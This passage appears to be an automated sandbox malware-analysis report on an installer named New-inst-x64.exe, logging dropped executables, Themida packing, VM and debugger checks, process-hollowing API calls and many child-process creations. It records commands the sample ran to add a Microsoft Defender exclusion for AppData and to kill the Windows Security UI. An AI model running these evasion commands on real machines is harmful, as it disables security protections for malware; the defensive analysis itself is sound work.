      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeSection loaded: apphelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: New-inst-x64.exe Static PE information: More than 8191 > 100 exports found
      Source: New-inst-x64.exe Static PE information: Virtual size of .text is bigger than: 0x100000
      Source: New-inst-x64.exe Static file information: File size 57894039 > 1048576
      Source: New-inst-x64.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0xe04c00
      Source: New-inst-x64.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2809000
      Source: New-inst-x64.exe Static PE information: More than 200 imports for KERNEL32.dll
      Source: New-inst-x64.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: New-inst-x64.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: New-inst-x64.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: New-inst-x64.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: New-inst-x64.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: New-inst-x64.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: New-inst-x64.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: New-inst-x64.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASM source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\Users\szska\.nexe\16.20.2\out\Release\node.pdb source: New-inst-x64.exe, 00000000.00000000.1171874817.000000000306D000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: !"#$% !"#$%&'()*+,-./0123456789:;<=>?@ABCD./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzdes(long)compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASMbuilt on: Sun Aug 6 12:30:37 2023 UTCplatform: OPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "NUL"QUICnot available@@@@@@@@@hHHHH@@@@@@@@@@@@@@@@@@( source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp
      Source: New-inst-x64.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: New-inst-x64.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: New-inst-x64.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: New-inst-x64.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: New-inst-x64.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: mbtbiqwunmmmyby.exe.0.dr Static PE information: 0xA9D5AF7D [Fri Apr 16 15:06:37 2060 UTC]
      Source: initial sample Static PE information: section where entry point is pointing to: .themida
      Source: xctyuuxnvcrcuez.exe.0.dr Static PE information: section name:
      Source: xctyuuxnvcrcuez.exe.0.dr Static PE information: section name:
      Source: xctyuuxnvcrcuez.exe.0.dr Static PE information: section name:
      Source: xctyuuxnvcrcuez.exe.0.dr Static PE information: section name:
      Source: xctyuuxnvcrcuez.exe.0.dr Static PE information: section name: .themida
      Source: ztrucvcctzwerxc.exe.0.dr Static PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.dr Static PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.dr Static PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.dr Static PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.dr Static PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.dr Static PE information: section name:
      Source: xctyuuxnvcrcuez.exe.0.dr Static PE information: section name: entropy: 7.985393389809318
      Source: ztrucvcctzwerxc.exe.0.dr Static PE information: section name: entropy: 7.914561090197707
      Source: vbczvzznbmunxtn.exe.0.dr Static PE information: section name: .text entropy: 7.09207256696417
      Source: C:\Users\user\Desktop\New-inst-x64.exe File created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe
      Source: C:\Users\user\Desktop\New-inst-x64.exe File created: C:\Users\user\AppData\Local\Temp\xctyuuxnvcrcuez.exe
      Source: C:\Users\user\Desktop\New-inst-x64.exe File created: C:\Users\user\AppData\Local\mbtbiqwunmmmyby.exe
      Source: C:\Users\user\Desktop\New-inst-x64.exe File created: C:\Users\user\AppData\Local\ztrucvcctzwerxc.exe

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 3000
      Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 3000
      Source: unknown Network traffic detected: HTTP traffic on port 3000 -> 49721
      Source: C:\Users\user\Desktop\New-inst-x64.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PortConnector
      Source: C:\Windows\System32\svchost.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3163
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 655
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5780
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3954
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6941
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2746
      Source: C:\Users\user\Desktop\New-inst-x64.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xctyuuxnvcrcuez.exe
      Source: C:\Users\user\Desktop\New-inst-x64.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\mbtbiqwunmmmyby.exe
      Source: C:\Users\user\Desktop\New-inst-x64.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\ztrucvcctzwerxc.exe
      Source: C:\Windows\System32\svchost.exe TID: 7944 Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 3932 Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8164 Thread sleep count: 3163 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8152 Thread sleep count: 655 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192 Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8184 Thread sleep time: -2767011611056431s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3580 Thread sleep count: 5780 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3984 Thread sleep count: 3954 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3432 Thread sleep time: -11068046444225724s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7988 Thread sleep count: 6941 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8172 Thread sleep time: -5534023222112862s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7988 Thread sleep count: 2746 > 30
      Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
      Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation
      Source: C:\Windows\System32\svchost.exe File Volume queried: C:\Windows\System32 FullSizeInformation
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: 28_2_0046FCDE FindFirstFileExW,28_2_0046FCDE
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: 28_2_0046FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,28_2_0046FD8F
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: 29_2_0046FCDE FindFirstFileExW,29_2_0046FCDE
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: 29_2_0046FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,29_2_0046FD8F
      Source: New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: 28_2_0045DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0045DC9E
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: 28_2_004861B4 mov edi, dword ptr fs:[00000030h] 28_2_004861B4
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: 28_2_0046B71C GetProcessHeap,28_2_0046B71C
      Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: 28_2_0045D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_0045D8E2
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: 28_2_0045DC92 SetUnhandledExceptionFilter,28_2_0045DC92
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: 28_2_0045DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0045DC9E
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: 28_2_00465DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00465DCE
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: 29_2_0045D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_0045D8E2
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: 29_2_0045DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_0045DC9E
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: 29_2_00465DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00465DCE

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Users\user\Desktop\New-inst-x64.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: 28_2_004861B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,28_2_004861B4
      Source: C:\Users\user\Desktop\New-inst-x64.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      Source: C:\Users\user\Desktop\New-inst-x64.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector""
      Source: C:\Users\user\Desktop\New-inst-x64.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "net session"
      Source: C:\Users\user\Desktop\New-inst-x64.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM SecHealthUI.exe"
      Source: C:\Users\user\Desktop\New-inst-x64.exe Process created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe
      Source: C:\Users\user\Desktop\New-inst-x64.exe Process created: unknown unknown
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-WmiObject Win32_PortConnector"
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net session
      Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 session
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM SecHealthUI.exe
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Process created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Process created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
